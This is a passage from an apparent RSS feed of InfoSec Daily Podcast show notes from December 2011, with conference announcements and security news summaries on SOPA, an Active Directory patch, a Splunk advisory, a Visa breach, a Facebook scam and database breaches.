<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The abrupt halt to Friday&rsquo;s proceeding, which followed a marathon-long, 11-hour hearing Thursday, was based on a motion from Rep. Jason Chaffetz (R-Utah). He urged Smith to postpone the session until technical experts could be brought in to testify whether altering the internet&rsquo;s domain-naming system to fight websites deemed &ldquo;dedicated&rdquo; to infringing activity would create security risks.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Just yesterday, Smith said that was not necessary, despite a signed letter by many of the internet&rsquo;s core engineers saying the bill&rsquo;s approach was technically flawed.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The legislation mandates that ISPs alter records in the net&rsquo;s system for looking up website names, known as DNS, so that users couldn&rsquo;t navigate to the site. Or, if ISPs choose not to introduce false information into DNS at the urging of the Justice Department, they instead would be required to employ some other method, such as deep-packet inspection, to prevent American citizens from visiting infringing sites.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ISPs, could, for instance, adopt tactics used by the Great Chinese Firewall to sniff for traffic going to a blacklisted site and simply block it.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.sec-1.com/blog/?p=233"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sec-1.com/blog/?p=233</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Gary O&rsquo;Leary-Steele</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Advisory: Multiple Splunk Vulnerabilities</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">crsf</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">remote exec</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">encoded directory traversal</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">free mode dont enforce authentication&#8230; whoops / password policy not enforced</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This aim of this project was to assess typical Splunk deployments for vulnerabilities that could be exploited by a malicious attacker paper: </span><a href="http://www.sec-1.com/blog/wp-content/uploads/2011/12/Attacking_Splunk_Release.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sec-1.com/blog/wp-content/uploads/2011/12/Attacking_Splunk_Release.pdf</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Multiple vulnerabilities were discovered that could be exploited to gain remote code execution as the root/localsystem user. A full description of the discovered vulnerabilities can be found here:</span><a href="http://www.sec-1.com/blog/wp-content/uploads/2011/12/Attacking_Splunk_Release.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Download</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The vendor has patched the issue in version 4.2.5. Sec-1 would like to thank Splunk for their prompt and professional response.</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-548-ms11-095-offensive-strikes-automated-bank-robbery-sopa-stoppa/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3284/0/infosec-daily-podcast-episode-548.mp3" length="16792711" type="audio/mpeg" />
		<itunes:duration>0:34:32</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 548 for December 16, 2011. &#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Themson Mester.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, a[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 548 for December 16, 2011. &#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Themson Mester.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: https://technet.microsoft.com/en-us/security/bulletin/ms11-095
	This security update resolves a privately reported vulnerability in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS). The vulnerability could allow remote code execution if an attacker logs on to an Active Directory domain and runs a specially crafted application. To exploit this vulnerability, an attacker would first need to acquire credentials to log on to an Active Directory domain.
	This security update is rated Important for Active Directory, ADAM, and AD LDS when installed on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 (except Itanium), Windows 7, and Windows Server 2008 R2 (except Itanium). For more information, see the subsection, Affected and Non-Affected Software, in this section.
	The security update addresses the vulnerability by changing the way that Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) handle objects in memory. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.
	&#8230;
	Source: http://www.wired.com/threatlevel/2011/12/internet-war-2/
	The House and Senate agreed to give the U.S. military the power to conduct &#8220;offensive&#8221; strikes online &#8212; including clandestine attacks, via a little-noticed provision in the military&#8217;s 2012 funding bill.
	The power, which was included in the House version but not the Senate version, was included in the final &#8220;reconciled&#8221; bill that is all but guaranteed to pass into law.
	Congress affirms that the Department of Defense has the capability, and upon direction by the President may conduct offe[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 547 &#8211; Naughty French, Visa, Ellen Scam, Big 5 &amp; Manning</title>
		<link>http://www.isdpodcast.com/episode-547-naughty-french-visa-ellen-scam-big-5-manning</link>
		<comments>http://www.isdpodcast.com/episode-547-naughty-french-visa-ellen-scam-big-5-manning#comments</comments>
		<pubDate>Fri, 16 Dec 2011 01:59:23 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3279</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 547 for December 15, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 547 for December 15, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;</span><a href="http://torrentfreak.com/french-presidents-residence-busted-for-bittorrent-piracy-111215/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://torrentfreak.com/french-presidents-residence-busted-for-bittorrent-piracy-111215/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nicholas Sarkozy, the president of France and one of the most powerful men of Europe, was busted today after journalists from a French news site, armed with &Eacute;lys&eacute;e Palace IPs, took a peak to see what has been downloaded from the president&rsquo;s residence. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If the three-strike piracy law adopted by French authorities early this year would be applied, the Palace would be left without an Internetconnection for about two months. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A total of six downloads that can be considered copyright infringement were recorded by the new BitTorrent-use tracking service as coming from Sarkozy&rsquo;s place, reports TorrentFreak.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tower Heist, Arthur Christmas and a high quality version of a BeachBoys album were among the pirated materials.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Now, even though the YouHaveDownloaded website&rsquo;s owners said that their service cannot handle Dynamic IP&rsquo;s, making the pirate-appointing business less accurate, a quick look at the IP addresses provided by Nicolas Perrier of Nikopik using the Whois service from DomainTools reveals that indeed the addresses belong to &ldquo;Presidence de la Republique&rdquo;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since the controversial website was launched, a lot of organizations that support anti-piracy movements were caught with their pants down. Yesterday we say how even Sony, Universal and Fox employees spend a lot of time downloading content from torrent sites.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.pcadvisor.co.uk/news/security/3325419/visa-investigates-security-breach-at-european-payment-processor"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcadvisor.co.uk/news/security/3325419/visa-investigates-security-breach-at-european-payment-processor</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Visa is investigating a potential security breach at an European payment processor that might have affected cardholders in eastern Europe.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Visa Europe has been informed of a potential data security breach at a European processor and an investigation is underway,&quot; the company said in a statement. &quot;We are working closely with our member banks to ensure cardholders are protected,&quot; it added.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The potentially affected payment processor is serving an undisclosed merchant chain that does business in several eastern European markets, Visa said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Multiple banks have been alerted and some have already taken steps to limit the potential fraud. Romanian state-owned CEC Bank is in the process of reissuing 17,000 payment cards as a result of the incident.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The bank </span><a href="https://www.cec.ro/3577/section.aspx/2957"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">received official reports</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> according to which information corresponding to a number of payment cards issued by Romanian and foreign financial institutions had been compromised.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.hollywoodreporter.com/thr-esq/ellen-degeneres-facebook-scam-lawsuit-273805"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.hollywoodreporter.com/thr-esq/ellen-degeneres-facebook-scam-lawsuit-273805</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pretty much everyone with an e-mail account is familiar with the type of scam wherein a person with connections has something valuable to offer, but is experiencing some form of trouble and is willing to provide compensation for needed assistance. Is someone trying to swindle those who would do practically anything for an all expense paid trip to meet their favorite talk show host?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Tuesday, Telepictures Prods, a subsidiary of Warner Bros. and a producer of The Ellen DeGeneres Show filed a lawsuit against an anonymous individual who allegedly has been posing as Ellen&#39;s manager.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the complaint, the defendant(s) created fake email accounts and a profile on Facebook in the name of Eric Gold, DeGeneres&#39; manager. After passing himself off as an employee of her show, the fake Eric Gold is said to have solicited and collected personal information from fans. How? Fans were told that they had been selected to appear on the program.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&#39;ve collected more info on the scam. A typical message began: </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;You have been selected from members of the Ellen DeGenere&#39;s Facebook Fan page to be on her talk show because of your comment on the &#39;Halloween edition&#39;. If you are interested in attending, this offer is an all expense paid trip from Ellen in appreciation of being a fan of Ellen.You are required to reply as soon as possible because we have limited time.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The message then promises that the recipient will receive a $3,000 check to cover travel expenses. To receive the check, the recipients have to give their full name, address, cell phone number and e-mail address.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.darkreading.com/database-security/167901020/security/news/232300536/five-big-database-breaches-of-2011-s-second-half.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/database-security/167901020/security/news/232300536/five-big-database-breaches-of-2011-s-second-half.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Though the second half of the year has been comparably calmer than the first half&#39;s excitement over database breaches at RSA, Sony, and Epsilon, the breach numbers continued to roll in &#8212; especially at healthcare organizations, which made up a disproportionate number of exposed records. Here are some of the biggest breaches that went down in the second half of the year, along with a few database security lessons learned.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. The Breach Victim: Nemours</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Assets Stolen/Affected: Names, addresses, dates of birth, Social Security numbers, insurance data, medical treatment data, and bank account information for 1.6 million patients, vendors, and employees.</span><br />
